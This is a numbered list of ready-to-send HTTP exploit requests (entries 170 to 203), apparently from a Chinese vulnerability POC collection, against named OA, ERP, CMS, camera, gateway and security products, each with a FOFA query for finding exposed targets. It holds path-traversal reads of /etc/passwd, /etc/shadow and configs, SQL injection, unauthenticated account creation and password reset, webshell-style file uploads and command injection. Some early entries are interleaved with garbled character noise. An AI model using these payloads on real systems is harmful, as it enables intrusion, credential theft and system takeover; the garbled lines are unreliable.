8 g' G! U' S; C% n1 t6 B9 q6 U
6 h2 J, U$ i6 w% I2 m170. 宏景EHR DisplayExcelCustomReport 任意文件读取' E4 a3 w+ z; x* p  X" C$ G
FOFA:body="/general/sys/hjaxmanage.js"
/ I* |& D" ?0 C. v7 y% k# o6 k7 RPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
) |' b9 }5 K' s  m: u& THost: balalanengliang
8 D1 A1 p. K# S; |4 A8 mUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 Y1 s3 @7 {' a+ K# X. _Content-Type: application/x-www-form-urlencoded2 n9 B8 o5 E  I. \. s  D

9 N$ ]- X9 t) Y4 j8 }/ Gfilename=../webapps/ROOT/WEB-INF/web.xml" O! ~+ a2 q- |2 v( P) g7 I
5 q7 Y; f8 x5 `  P0 Q: v

5 @/ }' s- N; N9 n0 n/ V171. 通天星CMSV6车载定位监控平台 SQL注入; v) M! p) N9 ?* B% N
FOFA:body="/808gps/"
, k" v/ Z! j# `GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
2 y9 [  k3 h' g! Y9 ^* i: GHost: your-ip' j4 N4 @7 l4 g* g8 e+ j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
5 B2 s. g9 g/ r4 P, C  y1 y: c" q( O" rAccept: */*
6 j" r0 {. j3 S# }1 L, m1 wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 ?; E1 z8 f, f+ X3 YAccept-Encoding: gzip, deflate; H; v( `; P5 a( O; x2 t- l  e
Connection: close: S7 n: T  l; R5 F$ w
2 t9 A  L( L9 ]$ P& j

" M: \: L4 j2 G$ [% g' A# ^
2 j& {2 m' y# q- x2 n: d# `/ ?5 f172. DT-高清车牌识别摄像机任意文件读取
3 b# W" @8 w3 r+ YFOFA:app="DT-高清车牌识别摄像机"/ Z. W/ R! G0 W; V0 }
GET /../../../../etc/passwd HTTP/1.1+ }1 j* H( ^& Z- E4 G! h! l
Host: your-ip
; X# Q9 `; A8 _  w. {; hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 N/ A. Y5 Z* R2 Y0 K- `Accept-Encoding: gzip, deflate
2 @) I1 K) l. @( [Accept: */*0 l- r. z  \6 V  y" ~
Connection: keep-alive3 X  q" \' R- \. y

6 w9 v3 s5 X" D/ A1 ]# a% X; r9 n% V# |8 ~6 g0 [5 Y

% p; n0 O1 f, V& y# j0 [5 S) M173. Check Point 安全网关任意文件读取$ S7 J, U  u- M1 _# [' m
CVE-2024-24919
8 r; P) V: g+ `FOFA:app="Check_Point-SSL-Network-Extender"( Y" p8 I4 z; o4 d
POST /clients/MyCRL HTTP/1.1+ V) @' W4 {3 [: K
Host: your-ip3 m8 r& C4 y3 `: A- \
Content-Type: application/x-www-form-urlencoded# i, k8 ?. ^0 g& z
  N' @( w0 G9 T- `
aCSHELL/../../../../../../../etc/shadow! |2 }' B$ Z) v2 E
3 F$ U3 W7 F5 n
2 d% ~0 t0 d) M! q& f+ K
7 @4 d: D3 d. h
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Verification: time-based against MSSQL (WAITFOR DELAY), about 5 seconds.

176. Telecom gateway configuration management system rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

The source post does not give the stored path; take it from the upload response.

. Q# ]0 a! v7 t9 ^177. H3C路由器敏感信息泄露! W- i  C+ d7 ?5 K2 G6 @- y) V$ L
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg' C  e+ X4 H* z+ N0 L  c" |' ]# @" D
/userLogin.asp/../actionpolicy_status/../M60.cfg
+ s, u3 Q" `' R' [/userLogin.asp/../actionpolicy_status/../GR8300.cfg
5 |# P, a4 W, @2 S# N3 A/ s" ]8 n7 Z/userLogin.asp/../actionpolicy_status/../GR5200.cfg4 I; ?7 W2 @% F1 V* N
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
5 x* p% M* q+ b* w/userLogin.asp/../actionpolicy_status/../GR2200.cfg& M/ F7 P. A, z. a  p2 O
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
- I0 N0 ?! d2 ^' t, V/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg  t' U2 d+ [6 j9 {$ e
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
$ m' n1 i" Q7 |$ g/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
1 I% Z' K9 [5 a! C. W( k* s/userLogin.asp/../actionpolicy_status/../ER5200.cfg" Q6 J6 {0 d  N& O5 a2 {3 u
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
8 G7 E2 L! \& v/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
8 t3 V7 s4 Z6 l4 h$ ?+ P/userLogin.asp/../actionpolicy_status/../ER3260.cfg* C# j7 N7 o: _! X
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg  R4 F# h4 q) j9 I1 W
/userLogin.asp/../actionpolicy_status/../ER3200.cfg2 h  M9 U# C8 a" {
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
8 Z5 v  J$ p0 M; k/userLogin.asp/../actionpolicy_status/../ER3108G.cfg; _( p' J4 Y6 Z+ h7 `, E
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
( \) c. f' z0 o! d( Z& ^7 a1 C5 h- E& [/userLogin.asp/../actionpolicy_status/../ER3100.cfg, w: P7 v/ ?4 s+ ]8 J) e/ c
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
  M5 B* v8 m1 F2 `" \8 O& S! f4 x6 Z& O, H- Y  S7 P

5 J2 w% _& _7 h) B178. H3C校园网自助服务系统-flexfileupload-任意文件上传
; @3 f; I0 ]7 B; SFOFA:header="/selfservice"- l% A# b. K7 h- I% Z: C( R0 [" I
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1$ ~# C0 `+ {6 K' I9 j
Host:( }$ B2 i% U0 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
: N8 O; N& Q  H; k, y! V! \6 ZContent-Length: 252* g  W* `# _# `- r, N7 _. f$ l' l/ u
Accept-Encoding: gzip, deflate
8 j/ ?" U9 A, H# xConnection: close
3 p# R( A5 `8 h- zContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
" f# ]% |( I! s  p+ l-----------------aqutkea7vvanpqy3rh2l" h: ^8 g$ C2 V( [2 B; {/ z. `
Content-Disposition: form-data; name="12234.txt"; filename="12234"# R% M. T1 W$ f
Content-Type: application/octet-stream
) X% v* X. f! L' B4 FContent-Length: 255
$ p" |3 W9 q5 S& ~2 R0 C6 S  ^; ~2 e
" M- v7 p: O: h2 O  v4 D: z7 H12234( Q) X$ z6 N5 S& a
-----------------aqutkea7vvanpqy3rh2l--5 D. ^+ y" n8 s% H2 F
0 x1 O- p7 r& d3 S& y3 }  T
1 k6 p9 P9 K6 B# S
GET /imc/primepush/%2e%2e/flex/12234.txt* @: V& i9 G2 p  p9 H* X3 ], e
$ L/ z5 Q- M- N6 Q5 R

179. 建文 project management system arbitrary file read
No FOFA query is given.
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA: app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Verification: error-based against MySQL (updatexml); the XPATH syntax error in the response contains the result of user() between the ~ markers.

181. 润申 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

Verification: time-based against MSSQL (WAITFOR DELAY), about 5 seconds.

182. 润申 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

Verification: log in with test1234/test1234 afterwards; the account is created without authentication.

183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Verification: error-based against Oracle (ctxsys.drithsx.sn); the ORA error in the response carries the result of the injected subquery, 111111*111111 = 12345654321. Note that the endpoint is a password-change handler and loginid/newpassword are part of the request, so test with a loginid that does not exist rather than a real account.

184. 迅饶 X2Modbus gateway AddUser arbitrary user creation
FOFA: server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

The body is a raw SQL INSERT that the endpoint executes as posted, creating the account root/123456 with PURVIEW 4.

185. 瑞友天翼 (Realor) application virtualization system SQL injection
Affected: version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

The hex string passed to unhex() is <?php echo md5("1"); $file = __FILE__; unlink($file); and the stacked query writes it with INTO OUTFILE to .\..\..\WebRoot\plom.xgi, so the MySQL account needs the FILE privilege and secure_file_priv must allow that path. If /plom.xgi is executed as PHP, requesting it returns c4ca4238a0b923820dcc509a6f75849b (md5 of "1") and the file deletes itself.

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power plants.
FOFA: title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

Verification: heavy-query time-based injection against SQLite (RANDOMBLOB), so expect a slow response rather than a fixed delay; the size can be adjusted to tune it.

187. Mura CMS processAsyncObject SQL injection (time-based variant of entry 158)
CVE-2024-32640
FOFA: "Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

Verification: time-based against MySQL (SLEEP(5)), about 5 seconds.

188. 叁体 佳会 video conferencing system attachment arbitrary file read
Affected: version <= 3.9.7
FOFA: body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet gets a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit assetsmanager_upload endpoint file upload

1. Run the POC to obtain the CSRF token, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to obtain a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

3. Upload using the session cookie obtained above:
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Fetch the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Substitute the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--